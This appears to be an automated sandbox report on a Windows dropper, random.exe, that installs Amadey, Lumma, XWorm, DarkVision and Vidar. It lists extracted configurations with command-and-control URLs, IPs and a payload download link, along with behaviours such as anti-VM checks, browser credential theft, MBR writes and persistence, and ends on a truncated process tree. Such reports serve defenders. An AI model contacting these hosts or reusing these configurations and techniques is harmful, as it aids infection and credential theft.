Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20250314-en -
resource tags
arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system -
submitted
06/04/2025, 05:56
Static task
static1
Behavioral task
behavioral1
Sample
random.exe
Resource
win10v2004-20250314-en
General
-
Target
random.exe
-
Size
6.2MB
-
MD5
f8e26aa8d0e36e4715bb611c8ee4325e
-
SHA1
7b44a79eda592b45e12cf53209f257762b43f003
-
SHA256
1af10179025d8901d6a774a0faa3a817095032a8d3a94c897fb78f57a896a129
-
SHA512
7b3827617a6b165095c2466304fe85059bca89e871933bd967f76bef86cf09f1d2ae70f981c9cb70ae808c7c51a9b54891fa151b9b24dbb4b6c8dee7c38035bb
-
SSDEEP
196608:4o9yNMMKE709CYUneSOv/g8NsIIyYyfeDhk/vA:X9i7n0TUneTgAGRd
Malware Config
Extracted
http://176.113.115.7/mine/random.exe
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Extracted
lumma
https://pepperiop.digital/oage
https://jrxsafer.top/shpaoz
https://plantainklj.run/opafg
https://puerrogfh.live/iqwez
https://quavabvc.top/iuzhd
https://advennture.top/GKsiio
https://targett.top/dsANGt
https://rambutanvcx.run/adioz
https://ywmedici.top/noagis
https://5pepperiop.digital/oage
https://rodformi.run/aUosoz
https://metalsyo.digital/opsa
https://ironloxp.live/aksdd
https://navstarx.shop/FoaJSi
https://wstarcloc.bet/GOksAo
https://atargett.top/dsANGt
https://spacedbv.world/EKdlsk
https://galxnetb.today/GsuIAo
https://cosmosyf.top/GOsznj
https://starcloc.bet/GOksAo
Extracted
xworm
5.0
127.0.0.1:9000
45.134.39.20:9000
oV8zKY7m1pKloRzQ
-
install_file
USB.exe
Extracted
darkvision
82.29.67.160
-
url
http://107.174.192.179/data/003
https://grabify.link/ZATFQO
http://107.174.192.179/clean
-
user_agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Extracted
vidar
13.4
f942dabea5a58a141236ae72e4720fbf
https://t.me/f07nd
https://steamcommunity.com/profiles/76561199843252735
-
user_agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0
Signatures
-
Amadey family
-
DarkVision Rat
DarkVision Rat is a trojan written in C++.
-
Darkvision family
-
Detect Vidar Stealer 19 IoCs
resource yara_rule behavioral1/memory/4296-275-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral1/memory/4296-276-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral1/memory/4296-278-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral1/memory/4296-290-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral1/memory/4296-295-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral1/memory/4296-300-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral1/memory/4296-310-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral1/memory/4296-320-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral1/memory/4296-326-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral1/memory/4296-331-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral1/memory/4296-354-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral1/memory/4296-380-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral1/memory/4296-677-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral1/memory/4296-678-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral1/memory/4296-681-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral1/memory/4296-685-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral1/memory/4296-690-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral1/memory/4296-697-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral1/memory/4296-703-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 -
Detect Xworm Payload 1 IoCs
resource yara_rule behavioral1/memory/4992-85-0x0000000000400000-0x000000000040E000-memory.dmp family_xworm -
Lumma family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
description pid Process procid_target PID 3796 created 3456 3796 wQI4o11.exe 55 PID 1068 created 3456 1068 wQI4o11.exe 55 -
Vidar family
-
Xworm family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 9 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ dfaa94e428.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ a244d4f733.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 1x99z3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 2T1218.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Temp5PLKCXZ0NTKTVWHWT2CWGAAF9RTVS64C.EXE -
Blocklisted process makes network request 1 IoCs
flow pid Process 59 4060 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 4060 powershell.exe 5064 powershell.exe -
Downloads MZ/PE file 12 IoCs
flow pid Process 59 4060 powershell.exe 91 2776 rapes.exe 98 1496 svchost.exe 94 2776 rapes.exe 94 2776 rapes.exe 145 4808 futors.exe 149 2776 rapes.exe 159 1496 svchost.exe 99 4808 futors.exe 333 4808 futors.exe 340 1496 svchost.exe 32 2776 rapes.exe -
Sets service image path in registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\h3f3f_4056\ImagePath = "\\??\\C:\\Windows\\Temp\\h3f3f_4056.sys" tzutil.exe -
Uses browser remote debugging 2 TTPs 11 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 4536 msedge.exe 1476 chrome.exe 368 chrome.exe 4144 chrome.exe 4848 chrome.exe 5216 msedge.exe 5740 msedge.exe 5732 msedge.exe 1060 chrome.exe 5184 msedge.exe 2808 msedge.exe -
Checks BIOS information in registry 2 TTPs 18 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Temp5PLKCXZ0NTKTVWHWT2CWGAAF9RTVS64C.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion dfaa94e428.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion dfaa94e428.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 1x99z3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 1x99z3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion a244d4f733.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion a244d4f733.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 2T1218.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 2T1218.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Temp5PLKCXZ0NTKTVWHWT2CWGAAF9RTVS64C.EXE -
Checks computer location settings 2 TTPs 5 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\Control Panel\International\Geo\Nation rapes.exe Key value queried \REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\Control Panel\International\Geo\Nation amnew.exe Key value queried \REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\Control Panel\International\Geo\Nation futors.exe Key value queried \REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\Control Panel\International\Geo\Nation 1x99z3.exe -
Deletes itself 1 IoCs
pid Process 5828 w32tm.exe -
Executes dropped EXE 29 IoCs
pid Process 3828 K7t97.exe 4152 1x99z3.exe 2776 rapes.exe 4280 2T1218.exe 2220 YMauSAr.exe 1068 VrQSuEQ.exe 3764 rapes.exe 3796 wQI4o11.exe 2280 43ee895fb1.exe 4396 Temp5PLKCXZ0NTKTVWHWT2CWGAAF9RTVS64C.EXE 4148 dfaa94e428.exe 1068 wQI4o11.exe 1704 VrQSuEQ.exe 4060 amnew.exe 4808 futors.exe 412 UZPt0hR.exe 1680 v7942.exe 1852 a244d4f733.exe 5300 alex12312321.exe 5828 w32tm.exe 5884 rapes.exe 5916 futors.exe 4476 legendarik.exe 4056 tzutil.exe 13296 futors.exe 5640 rapes.exe 5196 21b4bde783.exe 1060 svchost015.exe 6972 RYZusWg.exe -
Identifies Wine through registry keys 2 TTPs 9 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\Software\Wine dfaa94e428.exe Key opened \REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\Software\Wine 1x99z3.exe Key opened \REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\Software\Wine 2T1218.exe Key opened \REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\Software\Wine Temp5PLKCXZ0NTKTVWHWT2CWGAAF9RTVS64C.EXE Key opened \REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\Software\Wine a244d4f733.exe Key opened \REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\Software\Wine rapes.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 4 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" random.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" K7t97.exe Set value (str) \REGISTRY\USER\S-1-5-21-805952410-2104024357-1716932545-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}" svchost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}" svchost.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 40 ip-api.com -
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PHYSICALDRIVE0 a244d4f733.exe -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x0007000000024141-92.dat autoit_exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 9 IoCs
pid Process 4152 1x99z3.exe 2776 rapes.exe 4280 2T1218.exe 3764 rapes.exe 4396 Temp5PLKCXZ0NTKTVWHWT2CWGAAF9RTVS64C.EXE 4148 dfaa94e428.exe 1852 a244d4f733.exe 5884 rapes.exe 5640 rapes.exe -
Suspicious use of SetThreadContext 8 IoCs
description pid Process procid_target PID 1068 set thread context of 4612 1068 VrQSuEQ.exe 108 PID 3796 set thread context of 4992 3796 wQI4o11.exe 113 PID 1068 set thread context of 4928 1068 wQI4o11.exe 133 PID 1704 set thread context of 4548 1704 VrQSuEQ.exe 137 PID 1680 set thread context of 4296 1680 v7942.exe 150 PID 5300 set thread context of 5344 5300 alex12312321.exe 167 PID 4476 set thread context of 6048 4476 legendarik.exe 203 PID 5196 set thread context of 1060 5196 21b4bde783.exe 208 -
Drops file in Windows directory 2 IoCs
description ioc Process File created C:\Windows\Tasks\rapes.job 1x99z3.exe File created C:\Windows\Tasks\futors.job amnew.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 27 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegAsm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language K7t97.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language amnew.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language a244d4f733.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 21b4bde783.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost015.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1x99z3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wQI4o11.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 43ee895fb1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dfaa94e428.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language futors.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language UZPt0hR.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language random.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rapes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2T1218.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegAsm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Temp5PLKCXZ0NTKTVWHWT2CWGAAF9RTVS64C.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wQI4o11.exe -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 MSBuild.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString MSBuild.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier msedge.exe -
Enumerates system info in registry 2 TTPs 6 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe -
GoLang User-Agent 1 IoCs
Uses default user-agent string defined by GoLang HTTP packages.
description flow ioc HTTP User-Agent header 41 Go-http-client/1.1 -
Modifies data under HKEY_USERS 3 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133883926737110568" chrome.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry msedge.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ msedge.exe Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-805952410-2104024357-1716932545-1000\{EBB06C7D-445A-4279-868F-CF047A7F4E0A} msedge.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 932 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4152 1x99z3.exe 4152 1x99z3.exe 2776 rapes.exe 2776 rapes.exe 4280 2T1218.exe 4280 2T1218.exe 4280 2T1218.exe 4280 2T1218.exe 4280 2T1218.exe 4280 2T1218.exe 4612 MSBuild.exe 4612 MSBuild.exe 4612 MSBuild.exe 4612 MSBuild.exe 3764 rapes.exe 3764 rapes.exe 3796 wQI4o11.exe 3796 wQI4o11.exe 4060 powershell.exe 4060 powershell.exe 4396 Temp5PLKCXZ0NTKTVWHWT2CWGAAF9RTVS64C.EXE 4396 Temp5PLKCXZ0NTKTVWHWT2CWGAAF9RTVS64C.EXE 4148 dfaa94e428.exe 4148 dfaa94e428.exe 4148 dfaa94e428.exe 4148 dfaa94e428.exe 4148 dfaa94e428.exe 4148 dfaa94e428.exe 1068 wQI4o11.exe 1068 wQI4o11.exe 4548 MSBuild.exe 4548 MSBuild.exe 4548 MSBuild.exe 4548 MSBuild.exe 5064 powershell.exe 5064 powershell.exe 5064 powershell.exe 4296 MSBuild.exe 4296 MSBuild.exe 1852 a244d4f733.exe 1852 a244d4f733.exe 4296 MSBuild.exe 4296 MSBuild.exe 1476 chrome.exe 1476 chrome.exe 5344 MSBuild.exe 5344 MSBuild.exe 5344 MSBuild.exe 5344 MSBuild.exe 4296 MSBuild.exe 4296 MSBuild.exe 5884 rapes.exe 5884 rapes.exe 4296 MSBuild.exe 4296 MSBuild.exe 4296 MSBuild.exe 4296 MSBuild.exe 6048 MSBuild.exe 6048 MSBuild.exe 6048 MSBuild.exe 6048 MSBuild.exe 4296 MSBuild.exe 4296 MSBuild.exe 5640 rapes.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 4056 tzutil.exe -
Suspicious behavior: MapViewOfSection 3 IoCs
pid Process 412 UZPt0hR.exe 412 UZPt0hR.exe 412 UZPt0hR.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs
pid Process 1476 chrome.exe 1476 chrome.exe 1476 chrome.exe 1476 chrome.exe 5216 msedge.exe 5216 msedge.exe 5216 msedge.exe 5216 msedge.exe -
Suspicious use of AdjustPrivilegeToken 20 IoCs
description pid Process Token: SeDebugPrivilege 4060 powershell.exe Token: SeDebugPrivilege 4992 RegAsm.exe Token: SeDebugPrivilege 4928 RegAsm.exe Token: SeDebugPrivilege 5064 powershell.exe Token: SeShutdownPrivilege 1476 chrome.exe Token: SeCreatePagefilePrivilege 1476 chrome.exe Token: SeShutdownPrivilege 1476 chrome.exe Token: SeCreatePagefilePrivilege 1476 chrome.exe Token: SeShutdownPrivilege 1476 chrome.exe Token: SeCreatePagefilePrivilege 1476 chrome.exe Token: SeShutdownPrivilege 1476 chrome.exe Token: SeCreatePagefilePrivilege 1476 chrome.exe Token: SeShutdownPrivilege 1476 chrome.exe Token: SeCreatePagefilePrivilege 1476 chrome.exe Token: SeShutdownPrivilege 1476 chrome.exe Token: SeCreatePagefilePrivilege 1476 chrome.exe Token: SeShutdownPrivilege 1476 chrome.exe Token: SeCreatePagefilePrivilege 1476 chrome.exe Token: SeLoadDriverPrivilege 4056 tzutil.exe Token: SeDebugPrivilege 4588 powershell.exe -
Suspicious use of FindShellTrayWindow 33 IoCs
pid Process 4152 1x99z3.exe 2280 43ee895fb1.exe 2280 43ee895fb1.exe 2280 43ee895fb1.exe 4060 amnew.exe 1476 chrome.exe 1476 chrome.exe 1476 chrome.exe 1476 chrome.exe 1476 chrome.exe 1476 chrome.exe 1476 chrome.exe 1476 chrome.exe 1476 chrome.exe 1476 chrome.exe 1476 chrome.exe 1476 chrome.exe 1476 chrome.exe 1476 chrome.exe 1476 chrome.exe 1476 chrome.exe 1476 chrome.exe 1476 chrome.exe 1476 chrome.exe 1476 chrome.exe 1476 chrome.exe 1476 chrome.exe 1476 chrome.exe 1476 chrome.exe 1476 chrome.exe 1476 chrome.exe 5216 msedge.exe 5216 msedge.exe -
Suspicious use of SendNotifyMessage 3 IoCs
pid Process 2280 43ee895fb1.exe 2280 43ee895fb1.exe 2280 43ee895fb1.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 208 wrote to memory of 3828 208 random.exe 88 PID 208 wrote to memory of 3828 208 random.exe 88 PID 208 wrote to memory of 3828 208 random.exe 88 PID 2488 wrote to memory of 3520 2488 cmd.exe 89 PID 2488 wrote to memory of 3520 2488 cmd.exe 89 PID 3828 wrote to memory of 4152 3828 K7t97.exe 92 PID 3828 wrote to memory of 4152 3828 K7t97.exe 92 PID 3828 wrote to memory of 4152 3828 K7t97.exe 92 PID 3764 wrote to memory of 1932 3764 cmd.exe 94 PID 3764 wrote to memory of 1932 3764 cmd.exe 94 PID 4152 wrote to memory of 2776 4152 1x99z3.exe 97 PID 4152 wrote to memory of 2776 4152 1x99z3.exe 97 PID 4152 wrote to memory of 2776 4152 1x99z3.exe 97 PID 3828 wrote to memory of 4280 3828 K7t97.exe 98 PID 3828 wrote to memory of 4280 3828 K7t97.exe 98 PID 3828 wrote to memory of 4280 3828 K7t97.exe 98 PID 2776 wrote to memory of 2220 2776 rapes.exe 106 PID 2776 wrote to memory of 2220 2776 rapes.exe 106 PID 2776 wrote to memory of 1068 2776 rapes.exe 107 PID 2776 wrote to memory of 1068 2776 rapes.exe 107 PID 1068 wrote to memory of 4612 1068 VrQSuEQ.exe 108 PID 1068 wrote to memory of 4612 1068 VrQSuEQ.exe 108 PID 1068 wrote to memory of 4612 1068 VrQSuEQ.exe 108 PID 1068 wrote to memory of 4612 1068 VrQSuEQ.exe 108 PID 1068 wrote to memory of 4612 1068 VrQSuEQ.exe 108 PID 1068 wrote to memory of 4612 1068 VrQSuEQ.exe 108 PID 1068 wrote to memory of 4612 1068 VrQSuEQ.exe 108 PID 1068 wrote to memory of 4612 1068 VrQSuEQ.exe 108 PID 1068 wrote to memory of 4612 1068 VrQSuEQ.exe 108 PID 2776 wrote to memory of 3796 2776 rapes.exe 110 PID 2776 wrote to memory of 3796 2776 rapes.exe 110 PID 2776 wrote to memory of 3796 2776 rapes.exe 110 PID 3796 wrote to memory of 4992 3796 wQI4o11.exe 113 PID 3796 wrote to memory of 4992 3796 wQI4o11.exe 113 PID 3796 wrote to memory of 4992 3796 wQI4o11.exe 113 PID 3796 wrote to memory of 4992 3796 wQI4o11.exe 113 PID 3796 wrote to memory of 4992 3796 wQI4o11.exe 113 PID 3796 wrote to memory of 4992 3796 wQI4o11.exe 113 PID 3796 wrote to memory of 4992 3796 wQI4o11.exe 113 PID 3796 wrote to memory of 4992 3796 wQI4o11.exe 113 PID 2776 wrote to memory of 2280 2776 rapes.exe 115 PID 2776 wrote to memory of 2280 2776 rapes.exe 115 PID 2776 wrote to memory of 2280 2776 rapes.exe 115 PID 2280 wrote to memory of 1656 2280 43ee895fb1.exe 116 PID 2280 wrote to memory of 1656 2280 43ee895fb1.exe 116 PID 2280 wrote to memory of 1656 2280 43ee895fb1.exe 116 PID 2280 wrote to memory of 448 2280 43ee895fb1.exe 117 PID 2280 wrote to memory of 448 2280 43ee895fb1.exe 117 PID 2280 wrote to memory of 448 2280 43ee895fb1.exe 117 PID 1656 wrote to memory of 932 1656 cmd.exe 119 PID 1656 wrote to memory of 932 1656 cmd.exe 119 PID 1656 wrote to memory of 932 1656 cmd.exe 119 PID 448 wrote to memory of 4060 448 mshta.exe 120 PID 448 wrote to memory of 4060 448 mshta.exe 120 PID 448 wrote to memory of 4060 448 mshta.exe 120 PID 4060 wrote to memory of 4396 4060 powershell.exe 125 PID 4060 wrote to memory of 4396 4060 powershell.exe 125 PID 4060 wrote to memory of 4396 4060 powershell.exe 125 PID 2776 wrote to memory of 4148 2776 rapes.exe 126 PID 2776 wrote to memory of 4148 2776 rapes.exe 126 PID 2776 wrote to memory of 4148 2776 rapes.exe 126 PID 2776 wrote to memory of 1068 2776 rapes.exe 131 PID 2776 wrote to memory of 1068 2776 rapes.exe 131 PID 2776 wrote to memory of 1068 2776 rapes.exe 131 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3456
-
C:\Users\Admin\AppData\Local\Temp\random.exe"C:\Users\Admin\AppData\Local\Temp\random.exe"2⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:208 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\K7t97.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\K7t97.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3828 -
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1x99z3.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1x99z3.exe4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
